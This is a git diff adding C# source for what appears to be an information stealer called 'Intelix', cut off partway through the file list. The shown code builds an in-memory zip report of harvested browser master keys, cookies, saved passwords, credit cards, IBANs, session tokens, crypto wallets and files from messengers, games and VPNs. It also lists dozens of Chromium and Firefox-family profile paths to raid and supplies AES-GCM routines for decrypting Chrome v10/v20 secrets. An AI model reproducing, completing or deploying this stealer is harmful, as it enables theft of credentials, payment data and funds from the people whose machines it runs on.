ConcurrentLong MaskCreditCard = new ConcurrentLong(0); + + public ConcurrentLong MaskedIban = new ConcurrentLong(0); + } + + public class CounterApplications + { + public string Name; + + public ConcurrentBag Files = new ConcurrentBag(); + } + + public ConcurrentBag FilesGrabber = new ConcurrentBag(); + + public ConcurrentBag CryptoDesktop = new ConcurrentBag(); + + public ConcurrentBag CryptoChromium = new ConcurrentBag(); + + public ConcurrentBag Browsers = new ConcurrentBag(); + + public ConcurrentBag Applications = new ConcurrentBag(); + + public ConcurrentBag Vpns = new ConcurrentBag(); + + public ConcurrentBag Games = new ConcurrentBag(); + + public ConcurrentBag Messangers = new ConcurrentBag(); + + public void Collect(InMemoryZip zip) + { + List list = new List(); + list.Add("\r\n \r\n _____ _ \r\n|_ _|____ _(_)\r\n | |/ _ \\ \\/ / |\r\n | | (_) > <| |\r\n |_|\\___/_/\\_\\_|\r\n "); + list.Add(" Developer @tcixt"); + list.Add(""); + List masterKeys = LocalState.GetMasterKeys(); + if (masterKeys.Count() > 0) + { + list.Add(string.Format("[Keys] [--{0}--] [{1}]", masterKeys.Count(), string.Join(", ", masterKeys.Select((string[] k) => Paths.GetBrowserName(k[0])).Distinct()))); + foreach (string[] item in masterKeys) + { + list.Add(" [" + Paths.GetBrowserName(item[0]) + " " + item[1] + "] " + item[2]); + } + list.Add(""); + } + if (Browsers.Count() > 0) + { + list.Add(string.Format("[Browsers] [--{0}--] [{1}]", Browsers.Count(), string.Join(", ", Browsers.Select((CounterBrowser b) => b.BrowserName).ToArray()))); + foreach (CounterBrowser browser in Browsers) + { + list.Add(" - " + browser.Profile); + if ((long)browser.Cookies != 0L) + { + list.Add($" [Cookies {(long)browser.Cookies}]"); + } + if ((long)browser.Password != 0L) + { + list.Add($" [Passwords {(long)browser.Password}]"); + } + if ((long)browser.CreditCards != 0L) + { + list.Add($" [CreditCards {(long)browser.CreditCards}]"); + } + if ((long)browser.AutoFill != 0L) + { + list.Add($" [AutoFill {(long)browser.AutoFill}]"); + } + if ((long)browser.RestoreToken != 0L) + { + list.Add($" [RestoreToken {(long)browser.RestoreToken}]"); + } + if ((long)browser.MaskCreditCard != 0L) + { + list.Add($" [MaskCreditCard {(long)browser.MaskCreditCard}]"); + } + if ((long)browser.MaskedIban != 0L) + { + list.Add($" [MaskedIban {(long)browser.MaskedIban}]"); + } + list.Add(""); + } + list.Add(""); + } + if (Applications.Count() > 0) + { + list.Add(string.Format("[Applications] [--{0}--] [{1}]", Applications.Count(), string.Join(", ", Applications.Select((CounterApplications b) => b.Name).ToArray()))); + foreach (CounterApplications application in Applications) + { + list.Add(" [Name " + application.Name + "]"); + foreach (string item2 in application.Files.Reverse()) + { + list.Add(" - " + item2); + } + list.Add(""); + } + list.Add(""); + } + if (Games.Count() > 0) + { + list.Add(string.Format("[Games] [--{0}--] [{1}]", Games.Count(), string.Join(", ", Games.Select((CounterApplications b) => b.Name).ToArray()))); + foreach (CounterApplications game in Games) + { + list.Add(" [Name " + game.Name + "]"); + foreach (string item3 in game.Files.Reverse()) + { + list.Add(" - " + item3); + } + list.Add(""); + } + list.Add(""); + } + if (Messangers.Count() > 0) + { + list.Add(string.Format("[Messangers] [--{0}--] [{1}]", Messangers.Count(), string.Join(", ", Messangers.Select((CounterApplications b) => b.Name).ToArray()))); + foreach (CounterApplications messanger in Messangers) + { + list.Add(" [Name " + messanger.Name + "]"); + foreach (string item4 in messanger.Files.Reverse()) + { + list.Add(" - " + item4); + } + list.Add(""); + } + list.Add(""); + } + if (Vpns.Count() > 0) + { + list.Add(string.Format("[Vpns] [--{0}--] [{1}]", Vpns.Count(), string.Join(", ", Vpns.Select((CounterApplications b) => b.Name).ToArray()))); + foreach (CounterApplications vpn in Vpns) + { + list.Add(" [Name " + vpn.Name + "]"); + foreach (string item5 in vpn.Files.Reverse()) + { + list.Add(" - " + item5); + } + list.Add(""); + } + list.Add(""); + } + if (CryptoChromium.Count() > 0) + { + list.Add($"[CryptoChromium] [--{CryptoChromium.Count()}--]"); + foreach (string item6 in CryptoChromium) + { + list.Add(" - " + item6); + } + list.Add(""); + } + if (CryptoDesktop.Count() > 0) + { + list.Add($"[CryptoDesktop] [--{CryptoDesktop.Count()}--]"); + foreach (string item7 in CryptoDesktop) + { + list.Add(" - " + item7); + } + list.Add(""); + } + if (FilesGrabber.Count() > 0) + { + list.Add($"[FilesGrabber] [--{FilesGrabber.Count()}--]"); + foreach (string item8 in FilesGrabber) + { + list.Add(" - " + item8); + } + list.Add(""); + } + zip.AddTextFile("IntelIX.txt", string.Join("\n", list)); + } +} diff --git a/New/Intelix.Helper.Data/InMemoryZip.cs b/New/Intelix.Helper.Data/InMemoryZip.cs new file mode 100644 index 0000000..e962205 --- /dev/null +++ b/New/Intelix.Helper.Data/InMemoryZip.cs @@ -0,0 +1,124 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.IO.Compression; +using System.Text; + +namespace Intelix.Helper.Data; + +public sealed class InMemoryZip : IDisposable +{ + private readonly ConcurrentDictionary _entries = new ConcurrentDictionary(StringComparer.OrdinalIgnoreCase); + + private readonly object _buildLock = new object(); + + private bool _disposed; + + public int Count => _entries.Count; + + private static string NormalizeEntryName(string name) + { + if (string.IsNullOrWhiteSpace(name)) + { + throw new ArgumentException("Entry name is null or empty", "name"); + } + name = name.Replace('\\', '/').Trim('/'); + if (name.Length != 0) + { + return name; + } + throw new ArgumentException("Invalid entry name", "name"); + } + + public void AddFile(string entryPath, byte[] content) + { + if (_disposed) + { + throw new ObjectDisposedException("InMemoryZip"); + } + if (content != null && content.Length != 0) + { + string key = NormalizeEntryName(entryPath); + byte[] copy = new byte[content.Length]; + Buffer.BlockCopy(content, 0, copy, 0, content.Length); + _entries.AddOrUpdate(key, copy, (string text, byte[] old) => copy); + } + } + + public void AddTextFile(string entryPath, string text) + { + if (!string.IsNullOrEmpty(text)) + { + AddFile(entryPath, Encoding.UTF8.GetBytes(text)); + } + } + + public void AddDirectoryFiles(string sourceDirectory, string targetEntryDirectory = "", bool recursive = true) + { + if (_disposed) + { + throw new ObjectDisposedException("InMemoryZip"); + } + if (string.IsNullOrEmpty(sourceDirectory)) + { + throw new ArgumentException("sourceDirectory"); + } + if (!Directory.Exists(sourceDirectory)) + { + return; + } + SearchOption searchOption = (recursive ? SearchOption.AllDirectories : SearchOption.TopDirectoryOnly); + string[] files = Directory.GetFiles(sourceDirectory, "*", searchOption); + foreach (string text in files) + { + string text2 = text.Substring(sourceDirectory.Length).TrimStart(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar); + string text3 = (string.IsNullOrEmpty(targetEntryDirectory) ? text2 : Path.Combine(targetEntryDirectory, text2)); + text3 = text3.Replace('\\', '/'); + try + { + byte[] content = File.ReadAllBytes(text); + AddFile(text3, content); + } + catch + { + } + } + } + + public byte[] ToArray(CompressionLevel compression = CompressionLevel.Fastest) + { + if (_disposed) + { + throw new ObjectDisposedException("InMemoryZip"); + } + lock (_buildLock) + { + using MemoryStream memoryStream = new MemoryStream(); + using (ZipArchive zipArchive = new ZipArchive(memoryStream, ZipArchiveMode.Create, leaveOpen: true, Encoding.UTF8)) + { + foreach (KeyValuePair entry in _entries) + { + using Stream stream = zipArchive.CreateEntry(entry.Key, compression).Open(); + byte[] value = entry.Value; + stream.Write(value, 0, value.Length); + } + } + return memoryStream.ToArray(); + } + } + + public void Clear() + { + _entries.Clear(); + } + + public void Dispose() + { + if (!_disposed) + { + _disposed = true; + _entries.Clear(); + } + } +} diff --git a/New/Intelix.Helper.Data/Paths.cs b/New/Intelix.Helper.Data/Paths.cs new file mode 100644 index 0000000..315419b --- /dev/null +++ b/New/Intelix.Helper.Data/Paths.cs @@ -0,0 +1,121 @@ +using System; +using System.IO; + +namespace Intelix.Helper.Data; + +public static class Paths +{ + public static string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); + + public static string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); + + public static string[] Discord = new string[4] + { + appdata + "\\discord", + appdata + "\\discordcanary", + appdata + "\\Lightcord", + appdata + "\\discordptb" + }; + + public static string[] Chromium = new string[66] + { + appdata + "\\Lulumi-browser", + appdata + "\\kingpinbrowser", + appdata + "\\Falkon\\Profiles", + appdata + "\\Hola\\chromium_profile", + appdata + "\\Opera Software\\Opera Stable", + appdata + "\\Opera Software\\Opera GX Stable", + localappdata + "\\Battle.net", + localappdata + "\\GhostBrowser", + localappdata + "\\ColibriBrowser", + localappdata + "\\Min\\User Data", + localappdata + "\\Coowon\\Coowon", + localappdata + "\\Uran\\User Data", + localappdata + "\\Kinza\\User Data", + localappdata + "\\Blisk\\User Data", + localappdata + "\\Xvast\\User Data", + localappdata + "\\Torch\\User Data", + localappdata + "\\CryptoTab Browser", + localappdata + "\\Comodo\\User Data", + localappdata + "\\Kometa\\User Data", + localappdata + "\\liebao\\User Data", + localappdata + "\\Chedot\\User Data", + localappdata + "\\K-Melon\\User Data", + localappdata + "\\Orbitum\\User Data", + localappdata + "\\Vivaldi\\User Data", + localappdata + "\\Slimjet\\User Data", + localappdata + "\\Iridium\\User Data", + localappdata + "\\Maxthon\\User Data", + localappdata + "\\Maxthon3\\User Data", + localappdata + "\\Nichrome\\User Data", + localappdata + "\\Chromodo\\User Data", + localappdata + "\\QIP Surf\\User Data", + localappdata + "\\Chromium\\User Data", + localappdata + "\\BitTorrent\\Maelstrom", + localappdata + "\\Globus VPN\\User Data", + localappdata + "\\CentBrowser\\User Data", + localappdata + "\\Amigo\\User\\User Data", + localappdata + "\\MapleStudio\\ChromePlus", + localappdata + "\\7Star\\7Star\\User Data", + localappdata + "\\Mail.Ru\\Atom\\User Data", + localappdata + "\\Comodo\\Dragon\\User Data", + localappdata + "\\UCBrowser\\User Data_i18n", + localappdata + "\\Google\\Chrome\\User Data", + localappdata + "\\Coowon\\Coowon\\User Data", + localappdata + "\\CocCoc\\Browser\\User Data", + localappdata + "\\AOL\\AOL Shield\\User Data", + localappdata + "\\Microsoft\\Edge\\User Data", + localappdata + "\\uCozMedia\\Uran\\User Data", + localappdata + "\\Element Browser\\User Data", + localappdata + "\\Sputnik\\Sputnik\\User Data", + localappdata + "\\Elements Browser\\User Data", + localappdata + "\\CCleaner Browser\\User Data", + localappdata + "\\360Chrome\\Chrome\\User Data", + localappdata + "\\Tencent\\QQBrowser\\User Data", + localappdata + "\\Naver\\Naver Whale\\User Data", + localappdata + "\\Baidu\\BaiduBrowser\\User Data", + localappdata + "\\360Browser\\Browser\\User Data", + localappdata + "\\Google(x86)\\Chrome\\User Data", + localappdata + "\\Epic Privacy Browser\\User Data", + localappdata + "\\CatalinaGroup\\Citrio\\User Data", + localappdata + "\\Yandex\\YandexBrowser\\User Data", + localappdata + "\\MapleStudio\\ChromePlus\\User Data", + localappdata + "\\AVAST Software\\Browser\\User Data", + localappdata + "\\BraveSoftware\\Brave-Browser\\User Data", + localappdata + "\\NVIDIA Corporation\\NVIDIA GeForce Experience", + localappdata + "\\BraveSoftware\\Brave-Browser-Nightly\\User Data", + localappdata + "\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer" + }; + + public static string[] Gecko = new string[18] + { + appdata + "\\Mozilla\\Firefox\\Profiles", + appdata + "\\Waterfox\\Profiles", + appdata + "\\K-Meleon\\Profiles", + appdata + "\\Thunderbird\\Profiles", + appdata + "\\Comodo\\IceDragon\\Profiles", + appdata + "\\8pecxstudios\\Cyberfox\\Profiles", + appdata + "\\NETGATE Technologies\\BlackHaw\\Profiles", + appdata + "\\Moonchild Productions\\Pale Moon\\Profiles", + appdata + "\\Ghostery Browser\\Profiles", + appdata + "\\Undetectable\\Profiles", + appdata + "\\Sielo\\profiles", + appdata + "\\Waterfox\\Profiles", + appdata + "\\conkeror.mozdev.org\\conkeror\\Profiles", + appdata + "\\Netscape\\Navigator\\Profiles", + appdata + "\\Mozilla\\SeaMonkey\\Profiles", + appdata + "\\FlashPeak\\SlimBrowser\\Profiles", + appdata + "\\Avant Profiles", + appdata + "\\Flock\\Profiles" + }; + + public static string GetBrowserName(string path) + { + string[] array = path.Split(Path.DirectorySeparatorChar); + if (path.Contains("Opera")) + { + return array[6].Replace(" Stable", ""); + } + return array[5]; + } +} diff --git a/New/Intelix.Helper.Encrypted/._AesGcm.cs b/New/Intelix.Helper.Encrypted/._AesGcm.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._AesGcm.cs differ diff --git a/New/Intelix.Helper.Encrypted/._AesGcm256.cs b/New/Intelix.Helper.Encrypted/._AesGcm256.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._AesGcm256.cs differ diff --git a/New/Intelix.Helper.Encrypted/._Asn1Der.cs b/New/Intelix.Helper.Encrypted/._Asn1Der.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._Asn1Der.cs differ diff --git a/New/Intelix.Helper.Encrypted/._Asn1DerObject.cs b/New/Intelix.Helper.Encrypted/._Asn1DerObject.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._Asn1DerObject.cs differ diff --git a/New/Intelix.Helper.Encrypted/._Blowfish.cs b/New/Intelix.Helper.Encrypted/._Blowfish.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._Blowfish.cs differ diff --git a/New/Intelix.Helper.Encrypted/._ChaCha20Poly1305.cs b/New/Intelix.Helper.Encrypted/._ChaCha20Poly1305.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._ChaCha20Poly1305.cs differ diff --git a/New/Intelix.Helper.Encrypted/._CngDecryptor.cs b/New/Intelix.Helper.Encrypted/._CngDecryptor.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._CngDecryptor.cs differ diff --git a/New/Intelix.Helper.Encrypted/._DpApi.cs b/New/Intelix.Helper.Encrypted/._DpApi.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._DpApi.cs differ diff --git a/New/Intelix.Helper.Encrypted/._LocalEncryptor.cs b/New/Intelix.Helper.Encrypted/._LocalEncryptor.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._LocalEncryptor.cs differ diff --git a/New/Intelix.Helper.Encrypted/._LocalState.cs b/New/Intelix.Helper.Encrypted/._LocalState.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._LocalState.cs differ diff --git a/New/Intelix.Helper.Encrypted/._NSSDecryptor.cs b/New/Intelix.Helper.Encrypted/._NSSDecryptor.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._NSSDecryptor.cs differ diff --git a/New/Intelix.Helper.Encrypted/._Navicat11Cipher.cs b/New/Intelix.Helper.Encrypted/._Navicat11Cipher.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._Navicat11Cipher.cs differ diff --git a/New/Intelix.Helper.Encrypted/._NssDumpMasterKey.cs b/New/Intelix.Helper.Encrypted/._NssDumpMasterKey.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._NssDumpMasterKey.cs differ diff --git a/New/Intelix.Helper.Encrypted/._RC4Crypt.cs b/New/Intelix.Helper.Encrypted/._RC4Crypt.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._RC4Crypt.cs differ diff --git a/New/Intelix.Helper.Encrypted/._TripleDes.cs b/New/Intelix.Helper.Encrypted/._TripleDes.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._TripleDes.cs differ diff --git a/New/Intelix.Helper.Encrypted/._Xor.cs b/New/Intelix.Helper.Encrypted/._Xor.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._Xor.cs differ diff --git a/New/Intelix.Helper.Encrypted/._YaAuthenticatedData.cs b/New/Intelix.Helper.Encrypted/._YaAuthenticatedData.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Encrypted/._YaAuthenticatedData.cs differ diff --git a/New/Intelix.Helper.Encrypted/AesGcm.cs b/New/Intelix.Helper.Encrypted/AesGcm.cs new file mode 100644 index 0000000..07f36bd --- /dev/null +++ b/New/Intelix.Helper.Encrypted/AesGcm.cs @@ -0,0 +1,99 @@ +using System; +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public static class AesGcm +{ + private const int MacBitSize = 128; + + private const int NonceBitSize = 96; + + private const int TagBytes = 16; + + private const int NonceBytes = 12; + + private const int HeaderBytes = 3; + + public static byte[] DecryptBrowser(byte[] encryptedData, byte[] masterKey10, byte[] masterKey20, bool checkprefix) + { + if (encryptedData.Length < 31) + { + return null; + } + string text = Encoding.ASCII.GetString(encryptedData, 0, 3); + byte[] array = new byte[12]; + Buffer.BlockCopy(encryptedData, 3, array, 0, 12); + int num = 15; + int num2 = encryptedData.Length - num - 16; + if (num2 < 0) + { + return null; + } + byte[] array2 = new byte[num2]; + if (num2 > 0) + { + Buffer.BlockCopy(encryptedData, num, array2, 0, num2); + } + byte[] array3 = new byte[16]; + Buffer.BlockCopy(encryptedData, encryptedData.Length - 16, array3, 0, 16); + byte[] array4 = ((text == "v20") ? masterKey20 : ((text == "v10") ? masterKey10 : null)); + if (array4 == null) + { + return null; + } + byte[] array5 = AesGcm256.Decrypt(array4, array, null, array2, array3); + if (array5 == null) + { + return null; + } + if (checkprefix && HasPrefix(array5)) + { + if (array5.Length <= 32) + { + return array5; + } + int num3 = 0; + for (int i = 0; i < 32; i++) + { + byte b = array5[i]; + if (b >= 32 && b <= 126) + { + num3++; + } + if (num3 > 2) + { + break; + } + } + if (num3 > 2) + { + if (array5.Length <= 32) + { + return new byte[0]; + } + byte[] array6 = new byte[array5.Length - 32]; + Array.Copy(array5, 32, array6, 0, array6.Length); + return array6; + } + } + return array5; + } + + private static bool HasPrefix(byte[] plainText) + { + if (plainText.Length < 32) + { + return false; + } + int num = 0; + for (int i = 0; i < 32; i++) + { + if (plainText[i] >= 32 && plainText[i] <= 126) + { + num++; + } + } + return num > 2; + } +} diff --git a/New/Intelix.Helper.Encrypted/AesGcm256.cs b/New/Intelix.Helper.Encrypted/AesGcm256.cs new file mode 100644 index 0000000..e2724f6 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/AesGcm256.cs @@ -0,0 +1,383 @@ +using System; + +namespace Intelix.Helper.Encrypted; + +public class AesGcm256 +{ + private static readonly byte[] SBox = new byte[256] + { + 99, 124, 119, 123, 242, 107, 111, 197, 48, 1, + 103, 43, 254, 215, 171, 118, 202, 130, 201, 125, + 250, 89, 71, 240, 173, 212, 162, 175, 156, 164, + 114, 192, 183, 253, 147, 38, 54, 63, 247, 204, + 52, 165, 229, 241, 113, 216, 49, 21, 4, 199, + 35, 195, 24, 150, 5, 154, 7, 18, 128, 226, + 235, 39, 178, 117, 9, 131, 44, 26, 27, 110, + 90, 160, 82, 59, 214, 179, 41, 227, 47, 132, + 83, 209, 0, 237, 32, 252, 177, 91, 106, 203, + 190, 57, 74, 76, 88, 207, 208, 239, 170, 251, + 67, 77, 51, 133, 69, 249, 2, 127, 80, 60, + 159, 168, 81, 163, 64, 143, 146, 157, 56, 245, + 188, 182, 218, 33, 16, 255, 243, 210, 205, 12, + 19, 236, 95, 151, 68, 23, 196, 167, 126, 61, + 100, 93, 25, 115, 96, 129, 79, 220, 34, 42, + 144, 136, 70, 238, 184, 20, 222, 94, 11, 219, + 224, 50, 58, 10, 73, 6, 36, 92, 194, 211, + 172, 98, 145, 149, 228, 121, 231, 200, 55, 109, + 141, 213, 78, 169, 108, 86, 244, 234, 101, 122, + 174, 8, 186, 120, 37, 46, 28, 166, 180, 198, + 232, 221, 116, 31, 75, 189, 139, 138, 112, 62, + 181, 102, 72, 3, 246, 14, 97, 53, 87, 185, + 134, 193, 29, 158, 225, 248, 152, 17, 105, 217, + 142, 148, 155, 30, 135, 233, 206, 85, 40, 223, + 140, 161, 137, 13, 191, 230, 66, 104, 65, 153, + 45, 15, 176, 84, 187, 22 + }; + + private static readonly byte[] Rcon = new byte[256] + { + 0, 1, 2, 4, 8, 16, 32, 64, 128, 27, + 54, 108, 216, 171, 77, 154, 47, 94, 188, 99, + 198, 151, 53, 106, 212, 179, 125, 250, 239, 197, + 145, 57, 114, 228, 211, 189, 97, 194, 159, 37, + 74, 148, 51, 102, 204, 131, 29, 58, 116, 232, + 203, 141, 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0 + }; + + private byte[] Key; + + private byte[,] RoundKeys; + + public AesGcm256(byte[] key) + { + if (key.Length != 32) + { + throw new ArgumentException("Key length must be 256 bits."); + } + Key = new byte[32]; + Array.Copy(key, Key, 32); + KeyExpansion(); + } + + public static byte[] Decrypt(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag) + { + return new AesGcm256(key).Decrypt(cipherText, authTag, iv, aad); + } + + private void KeyExpansion() + { + int num = 8; + int num2 = 4; + int num3 = 14; + RoundKeys = new byte[num2 * (num3 + 1), 4]; + for (int i = 0; i < num; i++) + { + RoundKeys[i, 0] = Key[4 * i]; + RoundKeys[i, 1] = Key[4 * i + 1]; + RoundKeys[i, 2] = Key[4 * i + 2]; + RoundKeys[i, 3] = Key[4 * i + 3]; + } + byte[] array = new byte[4]; + for (int j = num; j < num2 * (num3 + 1); j++) + { + array[0] = RoundKeys[j - 1, 0]; + array[1] = RoundKeys[j - 1, 1]; + array[2] = RoundKeys[j - 1, 2]; + array[3] = RoundKeys[j - 1, 3]; + if (j % num == 0) + { + byte b = array[0]; + array[0] = array[1]; + array[1] = array[2]; + array[2] = array[3]; + array[3] = b; + array[0] = SBox[array[0]]; + array[1] = SBox[array[1]]; + array[2] = SBox[array[2]]; + array[3] = SBox[array[3]]; + array[0] ^= Rcon[j / num]; + } + else if (num > 6 && j % num == 4) + { + array[0] = SBox[array[0]]; + array[1] = SBox[array[1]]; + array[2] = SBox[array[2]]; + array[3] = SBox[array[3]]; + } + RoundKeys[j, 0] = (byte)(RoundKeys[j - num, 0] ^ array[0]); + RoundKeys[j, 1] = (byte)(RoundKeys[j - num, 1] ^ array[1]); + RoundKeys[j, 2] = (byte)(RoundKeys[j - num, 2] ^ array[2]); + RoundKeys[j, 3] = (byte)(RoundKeys[j - num, 3] ^ array[3]); + } + } + + private void AddRoundKey(byte[,] state, int round) + { + for (int i = 0; i < 4; i++) + { + for (int j = 0; j < 4; j++) + { + state[j, i] ^= RoundKeys[round * 4 + i, j]; + } + } + } + + private void SubBytes(byte[,] state) + { + for (int i = 0; i < 4; i++) + { + for (int j = 0; j < 4; j++) + { + state[i, j] = SBox[state[i, j]]; + } + } + } + + private void ShiftRows(byte[,] state) + { + byte b = state[1, 0]; + state[1, 0] = state[1, 1]; + state[1, 1] = state[1, 2]; + state[1, 2] = state[1, 3]; + state[1, 3] = b; + b = state[2, 0]; + state[2, 0] = state[2, 2]; + state[2, 2] = b; + b = state[2, 1]; + state[2, 1] = state[2, 3]; + state[2, 3] = b; + b = state[3, 3]; + state[3, 3] = state[3, 2]; + state[3, 2] = state[3, 1]; + state[3, 1] = state[3, 0]; + state[3, 0] = b; + } + + private void MixColumns(byte[,] state) + { + byte[] array = new byte[4]; + for (int i = 0; i < 4; i++) + { + array[0] = (byte)(GFMultiply(2, state[0, i]) ^ GFMultiply(3, state[1, i]) ^ state[2, i] ^ state[3, i]); + array[1] = (byte)(state[0, i] ^ GFMultiply(2, state[1, i]) ^ GFMultiply(3, state[2, i]) ^ state[3, i]); + array[2] = (byte)(state[0, i] ^ state[1, i] ^ GFMultiply(2, state[2, i]) ^ GFMultiply(3, state[3, i])); + array[3] = (byte)(GFMultiply(3, state[0, i]) ^ state[1, i] ^ state[2, i] ^ GFMultiply(2, state[3, i])); + state[0, i] = array[0]; + state[1, i] = array[1]; + state[2, i] = array[2]; + state[3, i] = array[3]; + } + } + + private byte GFMultiply(byte a, byte b) + { + byte b2 = 0; + for (int i = 0; i < 8; i++) + { + if ((b & 1) != 0) + { + b2 ^= a; + } + bool num = (a & 0x80) != 0; + a <<= 1; + if (num) + { + a ^= 0x1B; + } + b >>= 1; + } + return b2; + } + + private void EncryptBlock(byte[] input, byte[] output) + { + int num = 4; + int num2 = 14; + byte[,] array = new byte[4, num]; + for (int i = 0; i < 16; i++) + { + array[i % 4, i / 4] = input[i]; + } + AddRoundKey(array, 0); + for (int j = 1; j <= num2 - 1; j++) + { + SubBytes(array); + ShiftRows(array); + MixColumns(array); + AddRoundKey(array, j); + } + SubBytes(array); + ShiftRows(array); + AddRoundKey(array, num2); + for (int k = 0; k < 16; k++) + { + output[k] = array[k % 4, k / 4]; + } + } + + private byte[] GF128Multiply(byte[] X, byte[] Y) + { + byte[] array = new byte[16]; + byte[] array2 = new byte[16]; + Array.Copy(Y, array2, 16); + for (int i = 0; i < 128; i++) + { + if (((X[i / 8] >> 7 - i % 8) & 1) == 1) + { + for (int j = 0; j < 16; j++) + { + array[j] ^= array2[j]; + } + } + bool flag = (array2[15] & 1) == 1; + for (int num = 15; num >= 0; num--) + { + array2[num] = (byte)((array2[num] >> 1) | (((num > 0) ? array2[num - 1] : 0) << 7)); + } + if (flag) + { + array2[0] ^= 225; + } + } + return array; + } + + private byte[] GHASH(byte[] H, byte[] A, byte[] C) + { + _ = (A.Length + 15) / 16; + _ = (C.Length + 15) / 16; + byte[] array = new byte[16]; + byte[] array2 = new byte[16]; + byte[] array3 = new byte[16]; + int num; + for (int i = 0; i < A.Length; i += num) + { + Array.Clear(array3, 0, 16); + num = Math.Min(16, A.Length - i); + Array.Copy(A, i, array3, 0, num); + for (int j = 0; j < 16; j++) + { + array2[j] = (byte)(array[j] ^ array3[j]); + } + array = GF128Multiply(array2, H); + } + int num2; + for (int i = 0; i < C.Length; i += num2) + { + Array.Clear(array3, 0, 16); + num2 = Math.Min(16, C.Length - i); + Array.Copy(C, i, array3, 0, num2); + for (int k = 0; k < 16; k++) + { + array2[k] = (byte)(array[k] ^ array3[k]); + } + array = GF128Multiply(array2, H); + } + byte[] array4 = new byte[16]; + ulong num3 = (ulong)A.Length * 8uL; + ulong num4 = (ulong)C.Length * 8uL; + for (int l = 0; l < 8; l++) + { + array4[7 - l] = (byte)(num3 >> l * 8); + array4[15 - l] = (byte)(num4 >> l * 8); + } + for (int m = 0; m < 16; m++) + { + array2[m] = (byte)(array[m] ^ array4[m]); + } + return GF128Multiply(array2, H); + } + + private void IncrementCounter(byte[] counterBlock) + { + int num = 15; + while (num >= 12 && ++counterBlock[num] == 0) + { + num--; + } + } + + public byte[] Decrypt(byte[] ciphertext, byte[] tag, byte[] iv, byte[] aad) + { + if (aad == null) + { + aad = new byte[0]; + } + byte[] array = new byte[16]; + EncryptBlock(new byte[16], array); + byte[] array2 = new byte[16]; + if (iv.Length == 12) + { + Array.Copy(iv, 0, array2, 0, 12); + array2[15] = 1; + } + else + { + array2 = GHASH(array, null, iv); + } + byte[] array3 = new byte[ciphertext.Length]; + byte[] array4 = new byte[16]; + Array.Copy(array2, array4, 16); + int num = ciphertext.Length / 16; + int num2 = ciphertext.Length % 16; + int num3 = ((num2 == 0) ? num : (num + 1)); + for (int i = 0; i < num3; i++) + { + IncrementCounter(array4); + byte[] array5 = new byte[16]; + EncryptBlock(array4, array5); + int num4 = ((i < num) ? 16 : num2); + for (int j = 0; j < num4; j++) + { + array3[i * 16 + j] = (byte)(ciphertext[i * 16 + j] ^ array5[j]); + } + } + byte[] array6 = GHASH(array, aad, ciphertext); + byte[] array7 = new byte[16]; + EncryptBlock(array2, array7); + byte[] array8 = new byte[16]; + for (int k = 0; k < 16; k++) + { + array8[k] = (byte)(array7[k] ^ array6[k]); + } + if (!VerifyTag(tag, array8)) + { + throw new Exception("Authentication tag does not match. Decryption failed."); + } + return array3; + } + + private bool VerifyTag(byte[] tag1, byte[] tag2) + { + if (tag1.Length != tag2.Length) + { + return false; + } + int num = 0; + for (int i = 0; i < tag1.Length; i++) + { + num |= tag1[i] ^ tag2[i]; + } + return num == 0; + } +} diff --git a/New/Intelix.Helper.Encrypted/Asn1Der.cs 